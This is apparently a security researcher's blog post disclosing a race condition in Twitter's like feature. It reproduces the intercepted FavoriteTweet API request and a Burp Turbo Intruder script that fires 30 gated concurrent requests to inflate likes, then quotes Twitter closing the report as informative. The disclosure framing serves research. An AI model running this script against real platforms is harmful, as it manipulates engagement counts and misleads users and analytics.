Hey InfoSec community,

Twitter is a social media platform used by millions of people around the world to share their thoughts, opinions, and experiences. One of its most popular features is the ability to “like” a tweet, which indicates approval or agreement with its content. Recent findings have uncovered a race condition bug in Twitter’s like functionality that allows more likes to be registered than intended. In this blog, we will dive deeper into this bug to examine how a race condition was exploited to obtain more likes than intended. This case highlights the need for developers and security researchers to be aware of the potential for race conditions and to take appropriate measures to prevent and mitigate them.

Warning:

Please note that the purpose of this blog is to share information about the race condition bug in Twitter’s like functionality. It is important to emphasize that exploiting this bug for any malicious purposes is strictly prohibited and can have serious consequences.

I strongly advise my readers to use this information for educational and research purposes only and to refrain from engaging in any actions that could harm individuals or organizations.

Thank you for your understanding and responsible use of this information.

What is Race Condition?

Race conditions are typical software vulnerability that can have serious consequences. These vulnerabilities arise when multiple processes or threads access a shared resource simultaneously and the outcome of the execution depends on the order in which the processes or threads are executed. In recent years, race conditions have been used to exploit systems in several ways. In this blog post, we will explore the importance of race conditions in the context of a specific case — Twitter’s Like Functionality.

Read more about Race Condition: Click Here

Story Begins

As an avid Twitter user, I frequently engage in both posting and reading content on the platform. Today, I noticed an unusual high number of likes on one of my posts and upon investigating the source, I was unable to identify their origin. At that time I received a message from a community member, Muhammed Anzil, who informed me that he had exploited the race condition bug in order to generate those additional likes. He was able to send multiple requests to the server within a short period of time, taking advantage of the race condition to artificially increase the number of likes on a tweet. While this may seem like a harmless prank, it is important to note that exploiting this bug can have serious consequences, including misleading analytics and potentially damaging the reputation of individuals or promoting malicious content.

Inner Workings of a Race Condition Bug

1. Intercept the request while clicking the Like Button
2. Capture the request & send it to Burp’s Turbo intruder:

POST /i/api/graphql/lI07N6Otwv1PhnEgXILM7A/FavoriteTweet HTTP/2
Host: twitter.com
Cookie: guest_id_marketing=REDACTED; 
guest_id_ads=REDACTED; 
personalization_id="REDACTED"; 
guest_id=REDACTED; 
ct0=REDACTED; 
_ga=REDACTED; 
kdt=REDACTED; 
twid=REDACTED; auth_token=REDACTED; dnt=1; external_referer=REDACTED;
 _gid=REDACTED; lang=en
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 83
Referer: https://twitter.com/home
X-Twitter-Auth-Type: OAuth2Session
X-Csrf-Token: REDACTED
X-Twitter-Client-Language: en
X-Twitter-Active-User: yes
Origin: https://twitter.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Sec-Gpc: 1
Authorization: Bearer REDACTED
Te: trailers
{"variables":{"tweet_id":"REDACTED"},"queryId":"REDACTED"}

3. Use: Race.py for exploitation

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    for i in range(30):
        engine.queue(target.req, target.baseInput, gate='race1')
    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')
    engine.complete(timeout=60)
def handleResponse(req, interesting):
    table.add(req)

4. After setting %s after the user-agent header, start the attack

5. Done!

Result: 30+ Likes instead of one!!

Likewise, it’s possible to increment the count

Despite his efforts, it appears that it was not given due consideration by the relevant parties. They Said:

This behaviour is already known to Twitter and is not considered to be a 
security vulnerability. 
Although the stats reflected by the website may be influenced for a while, 
this does not impact the confidentiality, integrity, or availability of the application. 
In addition, these manipulated statistics do not influence the ranking of the Tweet in Twitter's algorithms, 
preventing an attacker from using this behaviour in an attempt to have their Tweet displayed more favourably to other users. 
For this reason, we will close this report as informative. 
In addition, 
please note that resubmitting the same behaviour that was previously closed may result in your future submissions 
being closed as "Not Applicable"

Do you believe that the race condition bug in Twitter’s like functionality is a valid issue that should be addressed? or you think that it is being blown out of proportion?

I invite you to share your valuable insights and perspectives on this topic. Your contribution will enrich the ongoing discussion on this issue. Thank you for your engagement, and I look forward to connecting with you on social media. Click here to connect with me → 7h3h4ckv157

• Connect through Twitter
• Connect through LinkedIn